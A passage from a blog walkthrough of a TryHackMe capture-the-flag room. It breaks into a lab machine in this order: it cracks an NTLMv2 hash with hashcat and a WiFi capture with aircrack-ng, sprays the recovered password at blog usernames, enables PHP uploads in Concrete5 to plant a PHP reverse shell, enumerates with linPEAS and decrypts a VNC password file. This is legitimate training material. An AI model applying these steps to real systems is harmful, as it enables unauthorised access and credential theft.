&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3n5w18t2pz5vbjg7zsqc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3n5w18t2pz5vbjg7zsqc.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Domain Name: 3B
User Name: lgreen
Host name: 02694W-WIN10

NTProofStr: 73aeb418ae0e8a9ec167c4d0880cfe22
NTLMv2 Response:
    010100000000000049143c43a261d6012ce41adf31a1363c00000000020004003300420001001e003000310035003600360053002d00570049004e00310036002d004900520004001e0074006800720065006500620065006500730063006f002e0063006f006d0003003e003000310035003600360073002d00770069006e00310036002d00690072002e0074006800720065006500620065006500730063006f002e0063006f006d0005001e0074006800720065006500620065006500730063006f002e0063006f006d000700080049143c43a261d60106000400020000000800300030000000000000000100000000200000fc849ef6b042cb4e368a3cbbd2362b5ccc39324c75df3415b6166d7489ad1d2b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e00360036002e0033003600000000000000000000000000

NTLM Server Challenge: a2cce5d65c5fc02f
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;According to the article, final crackme format is&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;username::domain:ServerChallenge:NTProofstring:modifiedntlmv2response
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;which in our case would be&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;lgreen::3B:a2cce5d65c5fc02f:73aeb418ae0e8a9ec167c4d0880cfe22:010100000000000049143c43a261d6012ce41adf31a1363c00000000020004003300420001001e003000310035003600360053002d00570049004e00310036002d004900520004001e0074006800720065006500620065006500730063006f002e0063006f006d0003003e003000310035003600360073002d00770069006e00310036002d00690072002e0074006800720065006500620065006500730063006f002e0063006f006d0005001e0074006800720065006500620065006500730063006f002e0063006f006d000700080049143c43a261d60106000400020000000800300030000000000000000100000000200000fc849ef6b042cb4e368a3cbbd2362b5ccc39324c75df3415b6166d7489ad1d2b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e00360036002e0033003600000000000000000000000000
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Saving above to a file called &lt;code&gt;crackme.txt&lt;/code&gt; and running &lt;code&gt;hashcat&lt;/code&gt; on my host machine, with &lt;code&gt;rockyou.txt&lt;/code&gt; as a password list.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;❯ hashcat &lt;span class="nt"&gt;-m&lt;/span&gt; 5600 crackme.txt rockyou.txt 
    hashcat &lt;span class="o"&gt;(&lt;/span&gt;v6.1.1&lt;span class="o"&gt;)&lt;/span&gt; starting...

LGREEN::3B:a2cce5d65c5fc02f:73aeb418ae0e8a9ec167c4d0880cfe22:010100000000000049143c43a261d6012ce41adf31a1363c00000000020004003300420001001e003000310035003600360053002d00570049004e00310036002d004900520004001e0074006800720065006500620065006500730063006f002e0063006f006d0003003e003000310035003600360073002d00770069006e00310036002d00690072002e0074006800720065006500620065006500730063006f002e0063006f006d0005001e0074006800720065006500620065006500730063006f002e0063006f006d000700080049143c43a261d60106000400020000000800300030000000000000000100000000200000fc849ef6b042cb4e368a3cbbd2362b5ccc39324c75df3415b6166d7489ad1d2b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e00360036002e0033003600000000000000000000000000:CENSORED
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;SUCCESS!! Our password is &lt;code&gt;CENSORED&lt;/code&gt;, for the user &lt;code&gt;lgreen&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Trying this password for the VNC service at port 5901. Nope not working.
&lt;/li&gt;
&lt;li&gt;Let's try the &lt;code&gt;lgreen:CENSORED&lt;/code&gt; combo for the SSH Service at port 4012. Nope not working.
&lt;/li&gt;
&lt;li&gt;Maybe trying at the login portal in Concrete5 CMS will work? Tried. Nope not working. Tried with &lt;code&gt;admin&lt;/code&gt; and &lt;code&gt;root&lt;/code&gt; usernames as well.  In case you are wondering where the "Login" portal can be found.
&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfk7gcoq1dcuw0yat4fc.png" alt="Alt Text"&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ok, time to move on  &lt;/p&gt;




&lt;h4&gt;
  
  
  Cracking WiFi password from SamNetwork.cap file
&lt;/h4&gt;

&lt;p&gt;Since we have gathered as much as possible(I think) from the IDS logs, let's see what we can infer from the SamsNetwork.cap packet capture, which apparently is how &lt;code&gt;super-spam&lt;/code&gt; "got in".&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbwbljtcs493gwt1ox95w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbwbljtcs493gwt1ox95w.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Looks like a Network capture from a WiFi network. Looks like we'll have to use &lt;code&gt;aircrack-ng&lt;/code&gt; to guess the password for the network. Let's use &lt;code&gt;rockyou.txt&lt;/code&gt; as our wordlist.  &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Disclaimer: Not an expert on Wifi cracking :D Just used this command after reading some articles on how to crack Wifi passwords. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;code&gt;aircrack-ng -w /usr/share/wordlists/rockyou.txt SamsNetwork.cap&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgc2r3iiulq3c5pig6mvs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgc2r3iiulq3c5pig6mvs.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Password found is CENSORED. Let's try this in the login portal for the Blog. But what usernames do we use? Good question. Let's simply try using the usernames that are available in the blog posts themselves.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to &lt;a href="https://10.10.142.204/concrete5/index.php/blog" rel="noopener noreferrer"&gt;https://10.10.142.204/concrete5/index.php/blog&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Click on each of the Individual blog posts and extract the usernames found. We get a total of four users.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc1uf1e94eon20c2jpa0u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc1uf1e94eon20c2jpa0u.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The usernames we find are:  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;adam_admin&lt;/li&gt;
&lt;li&gt;benjamin_blogger&lt;/li&gt;
&lt;li&gt;lucy_loser&lt;/li&gt;
&lt;li&gt;donald_dump&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's try the password we just found for all of these usernames in the Blog Login portal.&lt;/p&gt;

&lt;p&gt;Success! The password works for the user &lt;strong&gt;donald_dump.&lt;/strong&gt;  &lt;/p&gt;
&lt;h4&gt;
  
  
  Uploading a PHP Reverse Shell.
&lt;/h4&gt;

&lt;p&gt;When you log in, you will see what looks like a debugging stack trace. But the URL will be set to &lt;code&gt;http://IP/concrete5/index.php/dashboard/welcome&lt;/code&gt;.  &lt;/p&gt;

&lt;p&gt;Just change the URL to "&lt;a href="http://IP/concrete5/index.php" rel="noopener noreferrer"&gt;http://IP/concrete5/index.php&lt;/a&gt;", and we will be at the home page in "dashboard" mode for the CMS.  &lt;/p&gt;

&lt;p&gt;Now that we logged in to the CMS, let's try to upload a PHP reverse shell to get a foothold in the machine. Click on Settings(top-right corner button), go to File Manager. Here there is an "Upload Files" button. Let's try that.  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fta1r7fxepsu9nczqwq2m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fta1r7fxepsu9nczqwq2m.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;We get an Invalid File Extension(hover cursor over the uploaded file box).   &lt;/p&gt;

&lt;p&gt;At this point, we must remember that we found an &lt;a href="https://hackerone.com/reports/768322" rel="noopener noreferrer"&gt;RCE exploit for Concrete5 CMS 8.5.2&lt;/a&gt;(scroll up to the beginning of the Foothold section).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hackerone.com/reports/768322" rel="noopener noreferrer"&gt;https://hackerone.com/reports/768322&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/concrete5/concrete5/issues/8319" rel="noopener noreferrer"&gt;https://github.com/concrete5/concrete5/issues/8319&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;According to the HackerOne report, we need to go to Settings -&amp;gt; "System &amp;amp; Settings" -&amp;gt; Allowed File Types(under Files), and add PHP. Apparently, this will allow us to configure the File Manager to allow PHP file uploads. The report also says we need an "Admin" role. Looking at the Donald_Dump user in Dashboard -&amp;gt; Members -&amp;gt; Donald_Dump we see&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9m6hpmcmx965bjz29s2u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9m6hpmcmx965bjz29s2u.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;With that taken care of, let's try to add PHP to the list of allowed extensions.&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4xv7vg6tvn0ghs2yd2sl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4xv7vg6tvn0ghs2yd2sl.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;And now let's go back to File Manager and see if we can upload our reverse shell file.&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmltsci2h88i1dlw2uin7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmltsci2h88i1dlw2uin7.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;It works! Note down the "URL to File". Since the CMS seems to be using random number folder names to store uploaded files, we will need the exact path to access this, to get our reverse shell.&lt;/p&gt;

&lt;p&gt;The URL was like this for me =&amp;gt; &lt;code&gt;http://10.10.140.162/concrete5/application/files/7516/2852/3656/revshell.php&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;BTW this is the &lt;a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" rel="noopener noreferrer"&gt;Pentest Monkey PHP Reverse Shell&lt;/a&gt; file.  &lt;/p&gt;

&lt;p&gt;Start &lt;code&gt;netcat&lt;/code&gt; listener, and then visit to the Reverse Shell URL in the browser.  &lt;/p&gt;

&lt;p&gt;And we have shell! Foothold secured!  &lt;/p&gt;


&lt;h4&gt;
  
  
  Looking for user.txt
&lt;/h4&gt;

&lt;p&gt;Let's navigate around to look for the user flag in the home directory&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@super-spam:/home&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-lR&lt;/span&gt;
.:
total 20
drwxr-xr-x 2 benjamin_blogger benjamin_blogger 4096 Apr  9 15:22 benjamin_blogger
drw-rw---- 6 donalddump       donalddump       4096 Apr  9 15:23 donalddump
drwxr-xr-x 7 lucy_loser       lucy_loser       4096 Apr  9 15:23 lucy_loser
drwxr-xr-x 5 root             root             4096 May 30 20:08 personal
drwxr-xr-x 4 super-spam       super-spam       4096 Apr  9 15:24 super-spam

./benjamin_blogger:
total 0
&lt;span class="nb"&gt;ls&lt;/span&gt;: cannot open directory &lt;span class="s1"&gt;'./donalddump'&lt;/span&gt;: Permission denied

./lucy_loser:
total 12
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root   28 Feb 24 17:27 calcs.txt
drwxr-xr-x 2 root root 4096 Feb 24 17:27 prices
drwxr-xr-x 2 root root 4096 Feb 24 17:27 work

./lucy_loser/prices:
total 0

./lucy_loser/work:
total 0

./personal:
total 12
drwxr-xr-x 2 root root 4096 May 30 20:07 Dates
drwxr-xr-x 2 root root 4096 May 30 20:07 Work
drwxr-xr-x 2 root root 4096 May 30 20:08 Workload

./personal/Dates:
total 0

./personal/Work:
total 4
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 47 May 30 19:56 flag.txt

./personal/Workload:
total 4
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 215 Feb 20 17:04 nextEvilPlan.txt

./super-spam:
total 4
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 251 Feb 24 17:25 flagOfWindows
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And we have found our flag.txt in &lt;code&gt;/home/personal/Work/flag.txt&lt;/code&gt;  &lt;/p&gt;

&lt;p&gt;Also, the names of all the users who have folders in the &lt;code&gt;/home/&lt;/code&gt; folder&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;benjamin_blogger&lt;/li&gt;
&lt;li&gt;donalddump&lt;/li&gt;
&lt;li&gt;lucy_loser&lt;/li&gt;
&lt;li&gt;super-spam&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's have a look at the other folders and see if we can get something useful.  &lt;/p&gt;

&lt;p&gt;Found something in &lt;code&gt;lucy_loser&lt;/code&gt;'s directory&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd7fkdd076nkh3yj70yz1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd7fkdd076nkh3yj70yz1.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Well well. Looks like Lucy's a traitor :D And they are using &lt;strong&gt;XOR&lt;/strong&gt; encryption to communicate. The folder also a file &lt;code&gt;xored.py&lt;/code&gt; that allows you to XOR two images and output a result image.  &lt;/p&gt;


&lt;h4&gt;
  
  
  Finding the answers for the "encryption" questions
&lt;/h4&gt;

&lt;p&gt;The folder has ten files of the type &lt;code&gt;cX.png&lt;/code&gt;, where X ranges from 1-10. And then a &lt;code&gt;d.png&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;My guess is we can use the &lt;code&gt;xored.py&lt;/code&gt; script to remove the overlay(which was added as part of encryption probably), to make the underlying text more clearer.&lt;/p&gt;

&lt;p&gt;The encryption process is not intuitive, since we don't know what the "key" file is.&lt;/p&gt;

&lt;p&gt;As for how XOR Encryption works, read the "Example" section of this Wikipedia page =&amp;gt; &lt;a href="https://en.wikipedia.org/wiki/XOR_cipher" rel="noopener noreferrer"&gt;https://en.wikipedia.org/wiki/XOR_cipher&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;So, technically speaking. "Original Message" XOR "Encryption Key" =&amp;gt; "Encrypted Message"&lt;/p&gt;

&lt;p&gt;Also, "Encrypted Message" XOR "Encryption Key" =&amp;gt; "Original Message"  &lt;/p&gt;

&lt;p&gt;The machine has &lt;code&gt;Python3&lt;/code&gt;. So starting a web-server to download all the files so that we can do the work on our own machine. I was able to start the server on port 8080 and download the files.  &lt;/p&gt;

&lt;p&gt;Looking at the files on my own system.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frwdbgya2197cde8fkrlx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frwdbgya2197cde8fkrlx.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;d.png&lt;/code&gt; is the clearest image of all the four. It has some underlying text, over which some Lorem Ipsum text has been super-imposed, which I am guessing is the result of a XOR operation.  &lt;/p&gt;

&lt;p&gt;The cX.png files are not legible. The d.png is as follows.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffrr6ip33h2iqrjp7sqpc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffrr6ip33h2iqrjp7sqpc.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;I did not run the XOR Encryption. Just opened the file in an Image Viewer, and zoomed in as much as possible, and then typed out the message, which is&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Senior Favaeull, I am sending you this encrypted message so that you can maintain your persistence on the machine. Please be assured that I have encypted this message using Xor. I have told that clumsy assistant of mine to use different random keys for each message sent. I hope this finds you well. The new password will grant you access, it is the following: CENSORED. stay safe and well.

-Super Spam
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To be absolutely sure about the password(especially the first half), I tried running &lt;code&gt;xored.py&lt;/code&gt; for the cX.png files against each other. I got a good result for c8.png XOR c4.png.&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp3nb28i29flu75asso4v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp3nb28i29flu75asso4v.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;In the TryHackMe room, the password we obtain in this step is the answer for&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q:  What key information was embedded in one of super-spam's encrypted messages?  &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now, who the hell is Favaeull? The "clumsy assistant" mentioned here is clearly Lucy.  &lt;/p&gt;

&lt;p&gt;Tried this password all users on the SSH port 4012.&lt;br&gt;&lt;br&gt;
Success! It works for &lt;em&gt;donalddump&lt;/em&gt;. Now we have a proper shell.  &lt;/p&gt;


&lt;h3&gt;
  
  
  3) Privilege Escalation
&lt;/h3&gt;

&lt;p&gt;We can finally look into the &lt;code&gt;/home/donalddump/&lt;/code&gt; dir. We cannot change into the home dir initially. This is due to lack of execute permissions. Just execute &lt;code&gt;chmod u+x donalddump&lt;/code&gt; and get in.&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvnmmpnfky57wukk9j0hc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvnmmpnfky57wukk9j0hc.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Now there is a strange &lt;code&gt;passwd&lt;/code&gt; file here. It has some bytes. Try reading it in vim, and this is what you see.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcw5k6l2hhumxxv2hqp4h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcw5k6l2hhumxxv2hqp4h.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Now I did not know what to make of this. Probably encoding/encryption of some kind.  &lt;/p&gt;

&lt;p&gt;I kept this aside, and ran the &lt;a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" rel="noopener noreferrer"&gt;linPEAS.sh&lt;/a&gt; script to find PrivEsc vectors.  &lt;/p&gt;

&lt;p&gt;That's when I came across this strange entry in the process list in the linPEAS results&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2bdsf3peifr2o4nscbnl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2bdsf3peifr2o4nscbnl.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;You might wonder why this caught my eye. If you scroll up to the beginning, and look at the &lt;code&gt;nmap&lt;/code&gt; enumeration, you will see we have a VNC service running at port 5901, which we haven't used for anything yet.  &lt;/p&gt;

&lt;p&gt;Also another entry that caught my eye, that will be useful later on.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsucqvztb3iapkl3nt141.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsucqvztb3iapkl3nt141.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Those lines are from the machine's &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt; file =&amp;gt; &lt;a href="https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/linpeas.sh#L2314" rel="noopener noreferrer"&gt;https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/linpeas.sh#L2314&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;So &lt;code&gt;root&lt;/code&gt; login via SSH is allowed. Good thing to keep in mind.  &lt;/p&gt;


&lt;h4&gt;
  
  
  Finding a way to connect to the VNC service
&lt;/h4&gt;

&lt;p&gt;So now, I am guessing this is a password file for the VNC service. Let's try to find some details.  &lt;/p&gt;

&lt;p&gt;So Startpage search for "vnc passwd file" =&amp;gt; &lt;a href="https://www.tightvnc.com/vncpasswd.1.php" rel="noopener noreferrer"&gt;https://www.tightvnc.com/vncpasswd.1.php&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;So I am thinking, since we can't get the original password, why not try to change the password. The &lt;code&gt;vncpasswd&lt;/code&gt; command is available on the machine. But when we try to run it, it asks for a password.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;donalddump@super-spam:~&lt;span class="nv"&gt;$ &lt;/span&gt;vncpasswd 
Using password file /home/donalddump/.vnc/passwd
VNC directory /home/donalddump/.vnc does not exist, creating.
Password: 
Password too short
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since this is my first time dealing with TightVNC, I assume maybe I can try to set a new password. So I do a search for "change vnc password", and I come across this article =&amp;gt; &lt;a href="https://linuxconfig.org/how-to-change-vnc-password-on-linux" rel="noopener noreferrer"&gt;https://linuxconfig.org/how-to-change-vnc-password-on-linux&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;After reading this article, it dawns on me that this is an encrypted password, which is the output of the &lt;code&gt;vncpasswd&lt;/code&gt; command. Ok. Now search for "decrypt vnc password".&lt;/p&gt;

&lt;p&gt;And I find &lt;a href="https://github.com/jeroennijhof/vncpwd" rel="noopener noreferrer"&gt;https://github.com/jeroennijhof/vncpwd&lt;/a&gt;. A very convenient utility to help you decrypt the password.  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxvr18azo89lrxoiiqeg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxvr18azo89lrxoiiqeg.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;And we have the VNC Service password! Let's try connecting to it.&lt;br&gt;&lt;br&gt;
